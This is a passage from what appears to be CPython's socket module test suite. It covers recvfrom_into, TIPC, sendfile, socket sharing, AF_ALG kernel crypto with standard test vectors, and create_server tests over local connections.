def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory, or if we
        # don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
    # This must be a classmethod and not a staticmethod, or multiprocessing
    # won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
        # Receive the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
# bpo-37553: This is taking longer than 2 seconds on Windows ARM32 buildbot
TIMEOUT = 10 if sys.platform == 'win32' and platform.machine() == 'ARM' else 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
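    # Illustrative sketch of the client-side call pattern used below
    # (not executed here; ``path`` and ``addr`` are placeholders):
    #   with open(path, 'rb') as f, socket.create_connection(addr) as sock:
    #       sent = sock.sendfile(f, offset=0, count=None)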
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
    # non-blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
    # Although it should work with 3.19 and newer, the test blocks on
    # Ubuntu 15.10 with kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
        # available for a long time
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
                self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
